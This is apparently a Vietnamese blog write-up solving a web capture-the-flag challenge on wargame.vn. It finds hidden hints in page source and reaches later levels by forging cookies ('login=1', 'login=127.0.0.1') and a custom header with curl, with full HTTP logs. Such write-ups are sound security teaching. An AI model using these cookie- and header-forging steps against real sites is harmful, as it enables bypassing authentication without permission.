Ta xem source của trang:
view-source:http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/
=>> <!-- next: level2.php --> ở dòng 200
Level2: http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php
Ta xem HTTP header bằng live http header
http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php
GET /web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php HTTP/1.1Ta để ý 1 dòng rất quan trọng trong header này:
Host: challenges.wargame.vn:1337
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-vn,vi;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2013 18:45:18 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.3
Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 41
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
----------------------------------------------------------
Set-Cookie: login=0; expires=Thu, 01-Jan-1970 00:00:01 GMTDòng này có giá trị cookie login=0 nghĩa là chưa đăng nhập
Để send cookie lên server, ta có thể dùng curl:
$ curl -v --cookie "login=1" http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php
* About to connect() to challenges.wargame.vn port 1337 (#0)Vậy links vào level3 là: l3v3l_3.php
* Trying 210.211.125.85... connected
> GET /web100_d6da263d82cd07bd02cecf82f2b666b7/level2.php HTTP/1.1
> User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
> Host: challenges.wargame.vn:1337
> Accept: */*
> Cookie: login=1
>
< HTTP/1.1 200 OK
< Date: Wed, 31 Jul 2013 18:49:44 GMT
< Server: Apache/2.2.22 (Ubuntu)
< X-Powered-By: PHP/5.4.6-1ubuntu1.3
< Vary: Accept-Encoding
< Content-Length: 33
< Content-Type: text/html
<
* Connection #0 to host challenges.wargame.vn left intact
* Closing connection #0
<h1>Ops!</h1><!-- l3v3l_3.php -->
Level3: http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l_3.php
Ta dùng live http header để capture header:
GET /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l_3.php HTTP/1.1
Host: challenges.wargame.vn:1337
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: vi-vn,vi;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 31 Jul 2013 18:53:27 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.4.6-1ubuntu1.3
Set-Cookie: login=116.118.9.165; expires=Thu, 01-Jan-1970 00:00:01 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 58
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Ta lại thấy dòng: Set-Cookie: login=11x.118.xxx.xxx; expires=Thu, 01-Jan-1970 00:00:01 GMT
Nhưng lần này là IP của máy
Ngoài ra khi view-source, ta có 1 hint: <!-- 127.0.0.1 -->
Như vậy, IP login của Cookie phải là 127.0.0.1
Ta tiếp tục dùng curl để gửi Cookie:
$ curl --cookie "login=127.0.0.1" 'challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l_3.php'
<!-- 127.0.0.1 -->
<h1>Ops!</h1><!-- l3v3l___4.php -->
Level4: http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
Ta view-source nó:
<!-- if($_SERVER['HTTP_1337']=='1337') -->
Array
(
[HTTP_HOST] => challenges.wargame.vn:1337
[HTTP_USER_AGENT] => Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
[HTTP_ACCEPT] => text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
[HTTP_ACCEPT_LANGUAGE] => vi-vn,vi;q=0.8,en-us;q=0.5,en;q=0.3
[HTTP_ACCEPT_ENCODING] => gzip, deflate
[HTTP_DNT] => 1
[HTTP_CONNECTION] => keep-alive
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.22 (Ubuntu)
Server at challenges.wargame.vn Port 1337</address>
[SERVER_SOFTWARE] => Apache/2.2.22 (Ubuntu)
[SERVER_NAME] => challenges.wargame.vn
[SERVER_ADDR] => 210.211.125.85
[SERVER_PORT] => 1337
[REMOTE_ADDR] => 116.118.9.165
[DOCUMENT_ROOT] => /var/www2
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www2/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REMOTE_PORT] => 1939
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
[REQUEST_URI] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[SCRIPT_NAME] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[PHP_SELF] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REQUEST_TIME_FLOAT] => 1375297124.212
[REQUEST_TIME] => 1375297124
)
Hint ở đây là: <!-- if($_SERVER['HTTP_1337']=='1337') -->
Hint này đưa ta đến với google: $_SERVER và lấy được
<?php
$_SERVER['HTTP_X_DEBUG_CUSTOM']; // "some string"
?>Với X_DEBUG_CUSTOM là 1 chuỗi nào đó, ta gửi header bằng Curl $ curl --header "1337:1337" http://challenges.wargame.vn:1337/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
<!-- if($_SERVER['HTTP_1337']=='1337') -->
Array
(
[HTTP_USER_AGENT] => curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
[HTTP_HOST] => challenges.wargame.vn:1337
[HTTP_ACCEPT] => */*
[HTTP_1337] => 1337
[PATH] => /usr/local/bin:/usr/bin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.2.22 (Ubuntu) Server at challenges.wargame.vn Port 1337</address>
[SERVER_SOFTWARE] => Apache/2.2.22 (Ubuntu)
[SERVER_NAME] => challenges.wargame.vn
[SERVER_ADDR] => 210.211.125.85
[SERVER_PORT] => 1337
[REMOTE_ADDR] => 54.225.164.184
[DOCUMENT_ROOT] => /var/www2
[SERVER_ADMIN] => webmaster@localhost
[SCRIPT_FILENAME] => /var/www2/web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REMOTE_PORT] => 35575
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] =>
[REQUEST_URI] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[SCRIPT_NAME] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[PHP_SELF] => /web100_d6da263d82cd07bd02cecf82f2b666b7/l3v3l___4.php
[REQUEST_TIME_FLOAT] => 1375297550.608
[REQUEST_TIME] => 1375297550
)
<h1>Ops!</h1><!-- level_$5.php --> 
0 nhận xét:
Đăng nhận xét